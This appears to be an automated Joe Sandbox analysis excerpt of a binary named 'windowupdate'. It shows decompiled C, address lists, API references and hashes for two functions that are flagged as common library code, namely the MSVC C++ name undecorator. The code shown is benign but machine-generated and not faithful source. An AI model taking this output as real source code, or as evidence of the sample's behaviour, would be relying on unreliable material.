                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                      • String ID:
                      • API String ID: 254469556-0
                      • Opcode ID: 25654dbecc44f88314ff08e743423498d2b43c08bf5946c0a4e12ff86d1a44c4
                      • Instruction ID: 0be557a8698945529ba055754abbd31c42fa236d6c2a2d325a451b24fefe5140
                      • Opcode Fuzzy Hash: 25654dbecc44f88314ff08e743423498d2b43c08bf5946c0a4e12ff86d1a44c4
                      • Instruction Fuzzy Hash: C63136B8C053299BEF11DF60D8497DDBBB4EF18301F148199E80C6A281EB715A88CF61
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D575A0 Relevance: 87.9, APIs: 47, Strings: 3, Instructions: 399COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D575A0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v5;
				char _v16;
				intOrPtr _v20;
				char _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v88;
				signed int _v92;
				char _v96;
				signed int _v100;
				char _v104;
				signed int _v108;
				char _v112;
				signed int _v116;
				char _v120;
				char _v128;
				char _v136;
				char _v144;
				char _v152;
				char _v160;
				char _v168;
				char _v176;
				char _v184;
				char _v192;
				char _v200;
				char _v208;
				char _v216;
				char _v224;
				char _v232;
				char _v240;
				char _v248;
				char _v256;
				char _v264;
				char _v272;
				char _v280;
				char _v288;
				char _v296;
				char _v304;
				char _v312;
				char _v320;
				char _v328;
				signed int _t131;
				signed int _t142;
				signed int _t144;
				intOrPtr _t145;
				signed int _t149;
				intOrPtr _t153;
				void* _t177;
				void* _t180;
				void* _t185;
				signed int _t201;
				signed int _t205;
				signed int _t226;
				signed int _t229;
				void* _t243;
				void* _t244;
				void* _t245;

				_t244 = __esi;
				_t243 = __edi;
				_t185 = __ebx;
				E00D4F3F0( &_v16);
				_v5 = 0;
				while(E00D5AB70( &_v16) == 0) {
					_t142 =  *0xf20640; // 0x0
					if( *_t142 == 0) {
						break;
					}
					_t229 =  *0xf20640; // 0x0
					if( *_t229 == 0x40) {
						break;
					}
					if(( *0xf2064c & 0x000000ff) == 0) {
						L7:
						_t144 = E00D5A560( &_v16);
						if(_t144 == 0) {
							_v96 = E00D50060("::", 2);
							_v92 = _t229;
							_t177 = E00D4FAA0( &_v136,  &_v96,  &_v16);
							_t245 = _t245 + 0x14;
							E00D4F820( &_v16, _t177);
							if((_v5 & 0x000000ff) != 0) {
								_t180 = E00D4FAD0( &_v144, 0x5b,  &_v16);
								_t245 = _t245 + 0xc;
								E00D4F820( &_v16, _t180);
								_v5 = 0;
							}
						}
						_t201 =  *0xf20640; // 0x0
						if( *_t201 != 0x3f) {
							_t145 = E00D5A1E0(_t185, _t243, _t244,  &_v296, 1, 0);
							_t245 = _t245 + 0xc;
							_v72 = _t145;
							E00D4F820( &_v16, E00D4FB70(_v72,  &_v304,  &_v16));
							goto L41;
						} else {
							_t149 =  *0xf20640; // 0x0
							 *0xf20640 = _t149 + 1;
							_t205 =  *0xf20640; // 0x0
							_v20 =  *_t205;
							_v20 = _v20 - 0x24;
							if(_v20 > 0x2d) {
								L38:
								_t153 = E00D55B00(_t185, _t205, _t243, _t244,  &_v280);
								_t245 = _t245 + 4;
								_v68 = _t153;
								E00D4F820( &_v16, E00D4FB70(_v68,  &_v288,  &_v16));
								L39:
								L41:
								continue;
							}
							_t24 = _v20 + 0xd57af8; // 0xcccccc04
							switch( *((intOrPtr*)(( *_t24 & 0x000000ff) * 4 +  &M00D57AE0))) {
								case 0:
									 *0xf20640 =  *0xf20640 - 1;
									 *0xf20640 =  *0xf20640 - 1;
									__ecx =  &_v200;
									_v48 = E00D5A1E0(__ebx, __edi, __esi,  &_v200, 1, 0);
									__edx =  &_v16;
									__eax =  &_v208;
									__ecx = _v48;
									__eax = E00D4FB70(_v48,  &_v208,  &_v16);
									__ecx =  &_v16;
									__eax = E00D4F820(__ecx, __eax);
									goto L39;
								case 1:
									__ecx =  &_v128;
									__eax = E00D4F080( &_v128, 0xf20640, 0x40);
									_v104 = E00D50060("`anonymous namespace\'", 0x15);
									_v100 = __edx;
									__ecx =  &_v16;
									__edx =  &_v104;
									 &_v216 = E00D4FAA0( &_v216,  &_v104,  &_v16);
									__ecx =  &_v16;
									__eax = E00D4F820( &_v16, __eax);
									__ecx =  *0xf20638; // 0x0
									__eax = E00D5A590(__ecx);
									__eflags = __eax;
									if(__eax == 0) {
										__ecx =  &_v128;
										__ecx =  *0xf20638; // 0x0
										__eax = E00D4FF70(__ecx,  &_v128);
									}
									goto L39;
								case 2:
									_t210 =  *0xf20640; // 0x0
									__eflags =  *((char*)(_t210 + (1 << 0))) - 0x5f;
									if(__eflags != 0) {
										L18:
										_t160 = E00D4FAD0( &_v176, 0x60, E00D544C0(_t185, _t243, _t244, __eflags,  &_v168));
										_t245 = _t245 + 0x10;
										_v40 = _t160;
										_v44 = E00D4FBB0(_v40,  &_v184, 0x27);
										E00D4F820( &_v16, E00D4FB70(_v44,  &_v192,  &_v16));
										L19:
										goto L39;
									}
									_t216 =  *0xf20640; // 0x0
									__eflags =  *((char*)(_t216 + (1 << 1))) - 0x3f;
									if(__eflags != 0) {
										goto L18;
									}
									_t167 =  *0xf20640; // 0x0
									 *0xf20640 = _t167 + 1;
									_t169 = E00D55E80(_t185, _t243, _t244,  &_v152, 0, 0);
									_t245 = _t245 + 0xc;
									_v36 = _t169;
									E00D4F820( &_v16, E00D4FB70(_v36,  &_v160,  &_v16));
									_t220 =  *0xf20640; // 0x0
									__eflags =  *_t220 - 0x40;
									if( *_t220 == 0x40) {
										_t173 =  *0xf20640; // 0x0
										_t174 = _t173 + 1;
										__eflags = _t174;
										 *0xf20640 = _t174;
									}
									goto L19;
								case 3:
									 *0xf20640 =  *0xf20640 + 1;
									 *0xf20640 =  *0xf20640 + 1;
									__eax =  &_v224;
									_v52 = E00D5A1E0(__ebx, __edi, __esi,  &_v224, 1, 0);
									__ecx =  &_v232;
									__ecx = _v52;
									_v56 = E00D4FBB0(_v52,  &_v232, 0x5d);
									__edx =  &_v16;
									__eax =  &_v240;
									__ecx = _v56;
									__eax = E00D4FB70(_v56,  &_v240,  &_v16);
									__ecx =  &_v16;
									__eax = E00D4F820(__ecx, __eax);
									_v5 = 1;
									goto L39;
								case 4:
									__ecx =  &_v28;
									__eax = E00D4F3F0( &_v28);
									__ecx =  *0xf20640; // 0x0
									__ecx = __ecx + 1;
									__eflags = __ecx;
									 *0xf20640 = __ecx;
									while(1) {
										__edx =  &_v88;
										__eax = E00D5A1E0(__ebx, __edi, __esi,  &_v88, 1, 0);
										__ecx =  &_v88;
										__eax = E00D5AB70( &_v88);
										__eflags = __eax;
										if(__eax != 0) {
											__ecx =  &_v28;
											__eax = E00D4F920( &_v28, 2);
										} else {
											__ecx =  &_v28;
											__eax = E00D5A560( &_v28);
											__eflags = __eax;
											if(__eax != 0) {
												__ecx =  &_v88;
												__ecx =  &_v28;
												__eax = E00D4F820( &_v28,  &_v88);
											} else {
												_v112 = E00D50060("::", 2);
												_v108 = __edx;
												__eax =  &_v112;
												__ecx =  &_v248;
												__ecx =  &_v88;
												_v60 = E00D4FB30( &_v88,  &_v248,  &_v112);
												__edx =  &_v28;
												__eax =  &_v256;
												__ecx = _v60;
												__eax = E00D4FB70(_v60,  &_v256,  &_v28);
												__ecx =  &_v28;
												__eax = E00D4F820( &_v28, __eax);
											}
										}
										__ecx =  &_v28;
										__eax = E00D5AB70( &_v28);
										__eflags = __eax;
										if(__eax != 0) {
											break;
										}
										__edx =  *0xf20640; // 0x0
										__eax =  *__edx;
										__eflags =  *__edx - 0x40;
										if( *__edx != 0x40) {
											continue;
										}
										break;
									}
									__ecx =  &_v28;
									__eax = E00D5AB70( &_v28);
									__eflags = __eax;
									if(__eax != 0) {
										__ecx =  &_v16;
										__eax = E00D4F920(__ecx, 2);
									} else {
										__ecx =  &_v28;
										__edx =  &_v264;
										_v64 = E00D4FAD0( &_v264, 0x5b,  &_v28);
										__eax =  &_v272;
										__ecx = _v64;
										__eax = E00D4FBB0(_v64,  &_v272, 0x5d);
										__ecx =  &_v16;
										__eax = E00D4F820( &_v16, __eax);
										__ecx =  *0xf20640; // 0x0
										__ecx = __ecx + 1;
										 *0xf20640 = __ecx;
									}
									goto L39;
								case 5:
									goto L38;
							}
						}
					}
					_t229 =  *0xf2064d & 0x000000ff;
					if(_t229 != 0) {
						goto L7;
					}
					E00D4F240(_a4,  &_v16);
					return _a4;
				}
				_t226 =  *0xf20640; // 0x0
				_v32 =  *_t226;
				if(_v32 == 0) {
					_t131 = E00D5A560( &_v16);
					if(_t131 == 0) {
						_v120 = E00D50060("::", 2);
						_v116 = _t226;
						_v76 = E00D4F350( &_v312, 1);
						_v80 = E00D4FB30(_v76,  &_v320,  &_v120);
						E00D4F820( &_v16, E00D4FB70(_v80,  &_v328,  &_v16));
					} else {
						E00D4F920( &_v16, 1);
					}
				} else {
					if(_v32 != 0x40) {
						E00D4F920( &_v16, 2);
					}
				}
				E00D4F240(_a4,  &_v16);
				return _a4;
			}







































































                      0x00d575a0
                      0x00d575a0
                      0x00d575a0
                      0x00d575ac
                      0x00d575b1
                      0x00d575b5
                      0x00d575c5
                      0x00d575cf
                      0x00000000
                      0x00000000
                      0x00d575d5
                      0x00d575e1
                      0x00000000
                      0x00000000
                      0x00d575f0
                      0x00d57611
                      0x00d57614
                      0x00d5761b
                      0x00d5762c
                      0x00d5762f
                      0x00d57641
                      0x00d57646
                      0x00d5764d
                      0x00d57658
                      0x00d57667
                      0x00d5766c
                      0x00d57673
                      0x00d57678
                      0x00d57678
                      0x00d57658
                      0x00d5767c
                      0x00d57688
                      0x00d57a0a
                      0x00d57a0f
                      0x00d57a12
                      0x00d57a2c
                      0x00000000
                      0x00d5768e
                      0x00d5768e
                      0x00d57696
                      0x00d5769b
                      0x00d576a4
                      0x00d576ad
                      0x00d576b4
                      0x00d579cf
                      0x00d579d6
                      0x00d579db
                      0x00d579de
                      0x00d579f8
                      0x00d579fd
                      0x00d57a31
                      0x00000000
                      0x00d57a31
                      0x00d576bd
                      0x00d576c4
                      0x00000000
                      0x00d577b2
                      0x00d577b5
                      0x00d577be
                      0x00d577cd
                      0x00d577d0
                      0x00d577d4
                      0x00d577db
                      0x00d577de
                      0x00d577e4
                      0x00d577e7
                      0x00000000
                      0x00000000
                      0x00d577f8
                      0x00d577fb
                      0x00d5780f
                      0x00d57812
                      0x00d57815
                      0x00d57819
                      0x00d57824
                      0x00d5782d
                      0x00d57830
                      0x00d57835
                      0x00d5783b
                      0x00d57840
                      0x00d57842
                      0x00d57844
                      0x00d57848
                      0x00d5784e
                      0x00d5784e
                      0x00000000
                      0x00000000
                      0x00d576d3
                      0x00d576dd
                      0x00d576e0
                      0x00d57754
                      0x00d5776d
                      0x00d57772
                      0x00d57775
                      0x00d57789
                      0x00d577a3
                      0x00d577a8
                      0x00000000
                      0x00d577a8
                      0x00d576e9
                      0x00d576f3
                      0x00d576f6
                      0x00000000
                      0x00000000
                      0x00d576f8
                      0x00d57700
                      0x00d57710
                      0x00d57715
                      0x00d57718
                      0x00d57732
                      0x00d57737
                      0x00d57740
                      0x00d57743
                      0x00d57745
                      0x00d5774a
                      0x00d5774a
                      0x00d5774d
                      0x00d5774d
                      0x00000000
                      0x00000000
                      0x00d5785e
                      0x00d57861
                      0x00d5786b
                      0x00d5787a
                      0x00d5787f
                      0x00d57886
                      0x00d5788e
                      0x00d57891
                      0x00d57895
                      0x00d5789c
                      0x00d5789f
                      0x00d578a5
                      0x00d578a8
                      0x00d578ad
                      0x00000000
                      0x00000000
                      0x00d578b6
                      0x00d578b9
                      0x00d578be
                      0x00d578c4
                      0x00d578c4
                      0x00d578c7
                      0x00d578cd
                      0x00d578d1
                      0x00d578d5
                      0x00d578dd
                      0x00d578e0
                      0x00d578e5
                      0x00d578e7
                      0x00d5794e
                      0x00d57951
                      0x00d578e9
                      0x00d578e9
                      0x00d578ec
                      0x00d578f1
                      0x00d578f3
                      0x00d5793e
                      0x00d57942
                      0x00d57945
                      0x00d578f5
                      0x00d57904
                      0x00d57907
                      0x00d5790a
                      0x00d5790e
                      0x00d57915
                      0x00d5791d
                      0x00d57920
                      0x00d57924
                      0x00d5792b
                      0x00d5792e
                      0x00d57934
                      0x00d57937
                      0x00d57937
                      0x00d5794a
                      0x00d57956
                      0x00d57959
                      0x00d5795e
                      0x00d57960
                      0x00000000
                      0x00000000
                      0x00d57962
                      0x00d57968
                      0x00d5796b
                      0x00d5796e
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d5796e
                      0x00d57974
                      0x00d57977
                      0x00d5797c
                      0x00d5797e
                      0x00d579c5
                      0x00d579c8
                      0x00d57980
                      0x00d57980
                      0x00d57986
                      0x00d57995
                      0x00d5799a
                      0x00d579a1
                      0x00d579a4
                      0x00d579aa
                      0x00d579ad
                      0x00d579b2
                      0x00d579b8
                      0x00d579bb
                      0x00d579bb
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d576c4
                      0x00d57688
                      0x00d575f2
                      0x00d575fb
                      0x00000000
                      0x00000000
                      0x00d57604
                      0x00000000
                      0x00d57609
                      0x00d57a36
                      0x00d57a3e
                      0x00d57a45
                      0x00d57a52
                      0x00d57a59
                      0x00d57a76
                      0x00d57a79
                      0x00d57a89
                      0x00d57a9f
                      0x00d57ab9
                      0x00d57a5b
                      0x00d57a60
                      0x00d57a60
                      0x00d57a47
                      0x00d57a4b
                      0x00d57ac7
                      0x00d57ac7
                      0x00d57a4b
                      0x00d57ad3
                      0x00000000

                      APIs
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D575AC
                      • Mailbox.LIBCMTD ref: 00D57604
                      • DName::isEmpty.LIBCMTD ref: 00D57614
                      • operator+.LIBVCRUNTIMED ref: 00D57641
                      • Mailbox.LIBCMTD ref: 00D5764D
                      • operator+.LIBVCRUNTIMED ref: 00D57667
                      • Mailbox.LIBCMTD ref: 00D57673
                      • DName::operator+.LIBCMTD ref: 00D57729
                      • Mailbox.LIBCMTD ref: 00D57732
                      • UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 00D5775B
                        • Part of subcall function 00D544C0: UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 00D544EB
                        • Part of subcall function 00D544C0: Mailbox.LIBCMTD ref: 00D54536
                      • operator+.LIBVCRUNTIMED ref: 00D5776D
                        • Part of subcall function 00D4FAD0: DName::operator+.LIBCMTD ref: 00D4FAF1
                      • DName::operator+.LIBCMTD ref: 00D57784
                        • Part of subcall function 00D4FBB0: Mailbox.LIBCMTD ref: 00D4FBC0
                        • Part of subcall function 00D4FBB0: DName::operator+=.LIBCMTD ref: 00D4FBCD
                        • Part of subcall function 00D4FBB0: Mailbox.LIBCMTD ref: 00D4FBD9
                      • Mailbox.LIBCMTD ref: 00D577A3
                      • DName::operator+.LIBCMTD ref: 00D577DE
                      • Mailbox.LIBCMTD ref: 00D577E7
                      • DName::operator+.LIBCMTD ref: 00D57A23
                      • Mailbox.LIBCMTD ref: 00D57A2C
                      • DName::operator+.LIBCMTD ref: 00D5779A
                        • Part of subcall function 00D4FB70: Mailbox.LIBCMTD ref: 00D4FB80
                        • Part of subcall function 00D4FB70: Mailbox.LIBCMTD ref: 00D4FB98
                      • DName::isEmpty.LIBCMTD ref: 00D57A52
                      • DName::operator=.LIBVCRUNTIMED ref: 00D57A60
                      • DName::DName.LIBVCRUNTIMED ref: 00D57A84
                      • DName::operator+.LIBCMTD ref: 00D57A9A
                      • DName::operator+.LIBCMTD ref: 00D57AB0
                      • Mailbox.LIBCMTD ref: 00D57AB9
                      • DName::operator=.LIBVCRUNTIMED ref: 00D57AC7
                      • Mailbox.LIBCMTD ref: 00D57AD3
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Mailbox$Name::operator+$Nameoperator+$DecoratedDecorator::getEmptyName::isName::operator=$Iterator_baseIterator_base::_Name::Name::operator+=std::_
                      • String ID: -$@$`anonymous namespace'
                      • API String ID: 625857421-2591561782
                      • Opcode ID: 1a5ed7bbddc1068a35e56a762e6ba6eeaae893dccb03609fdce6b9659bad7b72
                      • Instruction ID: 54c92d864bc92459585c343ba72e9a5e973602aeda3c759434c8f0cce97d6746
                      • Opcode Fuzzy Hash: 1a5ed7bbddc1068a35e56a762e6ba6eeaae893dccb03609fdce6b9659bad7b72
                      • Instruction Fuzzy Hash: 35F184B2D04118ABDF14DFA4EC92FEE7775EF44301F148169E91A66192EB306A49CFB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D55490 Relevance: 75.6, APIs: 42, Strings: 1, Instructions: 391COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D55490(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v64;
				signed int _v68;
				char _v72;
				char _v80;
				char _v88;
				char _v96;
				char _v104;
				char _v112;
				char _v120;
				char _v128;
				char _v136;
				char _v144;
				char _v152;
				char _v160;
				char _v168;
				char _v176;
				char _v184;
				char _v192;
				char _v200;
				char _v208;
				char _v216;
				char _v224;
				char _v232;
				char _v240;
				char _v248;
				char _v256;
				char _v264;
				char _v272;
				signed int _t115;
				signed int _t117;
				signed int _t121;
				void* _t122;
				signed int _t124;
				void* _t131;
				signed int _t133;
				signed int _t134;
				signed int _t140;
				intOrPtr _t158;
				intOrPtr _t161;
				signed int _t165;
				void* _t166;
				intOrPtr _t170;
				void* _t172;
				signed int _t174;
				signed int _t180;
				void* _t183;
				void* _t186;
				void* _t190;
				void* _t194;
				intOrPtr _t197;
				signed int _t207;
				signed int _t211;
				void* _t215;
				signed int _t217;
				signed int _t218;
				signed int _t251;
				signed int _t252;
				signed int _t254;
				signed int _t265;
				signed int _t270;
				signed int _t274;
				signed int _t286;
				signed int _t290;
				signed int _t293;
				void* _t298;
				void* _t299;
				void* _t300;
				void* _t301;
				void* _t313;

				_t299 = __esi;
				_t298 = __edi;
				_t215 = __ebx;
				_t115 =  *0xf20640; // 0x0
				_t317 =  *_t115;
				if( *_t115 != 0) {
					_t217 =  *0xf20640; // 0x0
					__eflags =  *_t217 - 0x36;
					if( *_t217 < 0x36) {
						L4:
						_t270 =  *0xf20640; // 0x0
						__eflags =  *_t270 - 0x5f;
						if( *_t270 == 0x5f) {
							L6:
							_t218 =  *0xf20640; // 0x0
							_v32 =  *_t218 - 0x36;
							_t117 =  *0xf20640; // 0x0
							 *0xf20640 = _t117 + 1;
							_v8 = _v32;
							__eflags = _v8 - 0x29;
							if(_v8 != 0x29) {
								__eflags = _v8;
								if(_v8 < 0) {
									L16:
									_v8 = 0xffffffff;
									L17:
									__eflags = _v8 - 0xffffffff;
									if(_v8 != 0xffffffff) {
										E00D4F3F0( &_v64);
										_t222 =  &_v16;
										E00D4F240( &_v16, _a8);
										_t274 = _v8 & 0x00000002;
										__eflags = _t274;
										if(_t274 == 0) {
											L35:
											_t276 = _v8 & 0x00000004;
											__eflags = _v8 & 0x00000004;
											if((_v8 & 0x00000004) != 0) {
												_t165 = E00D52230(_t222);
												__eflags = _t165;
												if(_t165 == 0) {
													_t166 = E00D52BE0(_t215,  &_v168, _t276, _t298, _t299,  &_v168);
													_t300 = _t300 + 4;
													_t222 =  &_v16;
													E00D50000( &_v16, __eflags, _t166);
												} else {
													_t170 = E00D4FAD0( &_v152, 0x20, E00D52BE0(_t215, _t222, _t276, _t298, _t299,  &_v144));
													_t300 = _t300 + 0x10;
													_v44 = _t170;
													_t172 = E00D4FB70(_v44,  &_v160,  &_v16);
													_t222 =  &_v16;
													E00D4F820( &_v16, _t172);
												}
											}
											_t121 = E00D52230(_t222);
											__eflags = _t121;
											if(_t121 == 0) {
												_t122 = E00D537C0( &_v192);
												_t301 = _t300 + 4;
												E00D50000( &_v16, __eflags, _t122);
											} else {
												_t161 = E00D537C0( &_v176);
												_t301 = _t300 + 4;
												_v48 = _t161;
												E00D4F820( &_v16, E00D4FB70(_v48,  &_v184,  &_v16));
											}
											_t124 = E00D5A560(_a8);
											__eflags = _t124;
											if(_t124 == 0) {
												_t158 = E00D4FAD0( &_v200, 0x28,  &_v16);
												_t301 = _t301 + 0xc;
												_v52 = _t158;
												E00D4F820( &_v16, E00D4FBB0(_v52,  &_v208, 0x29));
											}
											_v24 = E00D4F7A0(8, 0xf2065c, 0);
											__eflags = _v24;
											if(_v24 == 0) {
												_v28 = 0;
											} else {
												_v28 = E00D4F3F0(_v24);
											}
											_v20 = _v28;
											E00D57550(_t215, _t298, _t299,  &_v80, _v20);
											_v56 = E00D4FAD0( &_v224, 0x28, E00D525F0(_t215, _t298, _t299,  &_v216));
											_t131 = E00D4FBB0(_v56,  &_v232, 0x29);
											_t228 =  &_v16;
											E00D4FD40( &_v16, _t131);
											_t133 = E00D52380( &_v16);
											__eflags = _t133;
											if(_t133 != 0) {
												__eflags = _v8 & 0x00000002;
												if((_v8 & 0x00000002) != 0) {
													_t228 =  &_v16;
													E00D4FD40( &_v16,  &_v64);
												}
											}
											_t134 = E00D52350(_t228);
											__eflags = _t134;
											if(_t134 == 0) {
												E00D50000( &_v16, __eflags, E00D57390( &_v248));
											} else {
												E00D4FD40( &_v16, E00D57390( &_v240));
											}
											E00D4FD40( &_v16, E00D55D00( &_v256));
											_t140 = E00D523B0( &_v16);
											__eflags = _t140;
											if(_t140 == 0) {
												E00D50000( &_v16, __eflags, E00D58EE0( &_v272));
											} else {
												E00D4FD40( &_v16, E00D58EE0( &_v264));
											}
											__eflags = _v20;
											if(_v20 == 0) {
												E00D4F350(_a4, 3);
												return _a4;
											} else {
												E00D4F820(_v20,  &_v16);
												E00D4F240(_a4,  &_v80);
												return _a4;
											}
										}
										_t174 =  *0xf20640; // 0x0
										__eflags =  *_t174 - 0x40;
										if( *_t174 == 0x40) {
											_t251 =  *0xf20640; // 0x0
											_t252 = _t251 + 1;
											__eflags = _t252;
											 *0xf20640 = _t252;
										} else {
											_v72 = E00D50060("::", 2);
											_v68 = _t274;
											_t190 = E00D4FAA0( &_v88,  &_v72,  &_v16);
											_t313 = _t300 + 0x14;
											E00D4F820( &_v16, _t190);
											_t290 =  *0xf20640; // 0x0
											__eflags =  *_t290;
											if(__eflags == 0) {
												_t194 = E00D4FB00(__eflags,  &_v120, 1,  &_v16);
												_t300 = _t313 + 0xc;
												E00D4F820( &_v16, _t194);
											} else {
												_t197 = E00D4FAD0( &_v104, 0x20, E00D575A0(_t215, _t298, _t299, __eflags,  &_v96));
												_t300 = _t313 + 0x10;
												_v40 = _t197;
												E00D4F820( &_v16, E00D4FB70(_v40,  &_v112,  &_v16));
											}
										}
										_t286 =  *0xf20640; // 0x0
										__eflags =  *_t286;
										if(__eflags == 0) {
											E00D4FB00(__eflags, _a4, 1,  &_v16);
											return _a4;
										} else {
											_t254 =  *0xf20640; // 0x0
											__eflags =  *_t254 - 0x40;
											if( *_t254 != 0x40) {
												E00D4F350(_a4, 2);
												return _a4;
											}
											_t180 =  *0xf20640; // 0x0
											 *0xf20640 = _t180 + 1;
											__eflags = E00D52380(_t254);
											if(__eflags == 0) {
												_t183 = E00D58EA0(_t215, _t298, _t299,  &_v136);
												_t300 = _t300 + 4;
												_t222 =  &_v64;
												E00D50000( &_v64, __eflags, _t183);
											} else {
												_t186 = E00D58EA0(_t215, _t298, _t299,  &_v128);
												_t300 = _t300 + 4;
												_t222 =  &_v64;
												E00D4F820( &_v64, _t186);
											}
											goto L35;
										}
									}
									E00D4F350(_a4, 2);
									return _a4;
								}
								__eflags = _v8 - 3;
								if(_v8 <= 3) {
									goto L17;
								}
								goto L16;
							}
							_t293 =  *0xf20640; // 0x0
							__eflags =  *_t293;
							if(__eflags == 0) {
								E00D4FB00(__eflags, _a4, 1, _a8);
								return _a4;
							}
							_t265 =  *0xf20640; // 0x0
							_v36 =  *_t265 - 0x3d;
							_t207 =  *0xf20640; // 0x0
							 *0xf20640 = _t207 + 1;
							_v8 = _v36;
							__eflags = _v8 - 4;
							if(_v8 < 4) {
								L10:
								_v8 = 0xffffffff;
								L11:
								goto L17;
							}
							__eflags = _v8 - 7;
							if(_v8 <= 7) {
								goto L11;
							}
							goto L10;
						}
						E00D4F350(_a4, 2);
						return _a4;
					}
					_t211 =  *0xf20640; // 0x0
					__eflags =  *_t211 - 0x39;
					if( *_t211 <= 0x39) {
						goto L6;
					}
					goto L4;
				}
				E00D4FB00(_t317, _a4, 1, _a8);
				return _a4;
			}




















































































                      0x00d55490
                      0x00d55490
                      0x00d55490
                      0x00d55499
                      0x00d554a1
                      0x00d554a3
                      0x00d554bf
                      0x00d554c8
                      0x00d554cb
                      0x00d554da
                      0x00d554da
                      0x00d554e3
                      0x00d554e6
                      0x00d554fa
                      0x00d554fa
                      0x00d55506
                      0x00d55509
                      0x00d55511
                      0x00d55519
                      0x00d5551c
                      0x00d55520
                      0x00d55582
                      0x00d55586
                      0x00d5558e
                      0x00d5558e
                      0x00d55595
                      0x00d55595
                      0x00d55599
                      0x00d555b0
                      0x00d555b9
                      0x00d555bc
                      0x00d555c4
                      0x00d555c4
                      0x00d555c7
                      0x00d55712
                      0x00d55715
                      0x00d55715
                      0x00d55718
                      0x00d5571a
                      0x00d5571f
                      0x00d55721
                      0x00d5576c
                      0x00d55771
                      0x00d55775
                      0x00d55778
                      0x00d55723
                      0x00d5573c
                      0x00d55741
                      0x00d55744
                      0x00d55755
                      0x00d5575b
                      0x00d5575e
                      0x00d5575e
                      0x00d55721
                      0x00d5577d
                      0x00d55782
                      0x00d55784
                      0x00d557bd
                      0x00d557c2
                      0x00d557c9
                      0x00d55786
                      0x00d5578d
                      0x00d55792
                      0x00d55795
                      0x00d557af
                      0x00d557af
                      0x00d557d1
                      0x00d557d6
                      0x00d557d8
                      0x00d557e7
                      0x00d557ec
                      0x00d557ef
                      0x00d55807
                      0x00d55807
                      0x00d5581d
                      0x00d55820
                      0x00d55824
                      0x00d55833
                      0x00d55826
                      0x00d5582e
                      0x00d5582e
                      0x00d5583d
                      0x00d55848
                      0x00d55871
                      0x00d55880
                      0x00d55886
                      0x00d55889
                      0x00d5588e
                      0x00d55893
                      0x00d55895
                      0x00d5589a
                      0x00d5589d
                      0x00d558a3
                      0x00d558a6
                      0x00d558a6
                      0x00d5589d
                      0x00d558ab
                      0x00d558b0
                      0x00d558b2
                      0x00d558e1
                      0x00d558b4
                      0x00d558c7
                      0x00d558c7
                      0x00d558f9
                      0x00d558fe
                      0x00d55903
                      0x00d55905
                      0x00d55934
                      0x00d55907
                      0x00d5591a
                      0x00d5591a
                      0x00d55939
                      0x00d5593d
                      0x00d55952
                      0x00000000
                      0x00d5593f
                      0x00d55946
                      0x00d55963
                      0x00000000
                      0x00d55968
                      0x00d5593d
                      0x00d555cd
                      0x00d555d5
                      0x00d555d8
                      0x00d55673
                      0x00d55679
                      0x00d55679
                      0x00d5567c
                      0x00d555de
                      0x00d555ed
                      0x00d555f0
                      0x00d555ff
                      0x00d55604
                      0x00d5560b
                      0x00d55610
                      0x00d55619
                      0x00d5561b
                      0x00d55660
                      0x00d55665
                      0x00d5566c
                      0x00d5561d
                      0x00d55630
                      0x00d55635
                      0x00d55638
                      0x00d5564f
                      0x00d5564f
                      0x00d55671
                      0x00d55682
                      0x00d5568b
                      0x00d5568d
                      0x00d556ca
                      0x00000000
                      0x00d5568f
                      0x00d5568f
                      0x00d55698
                      0x00d5569b
                      0x00d556b1
                      0x00000000
                      0x00d556b6
                      0x00d5569d
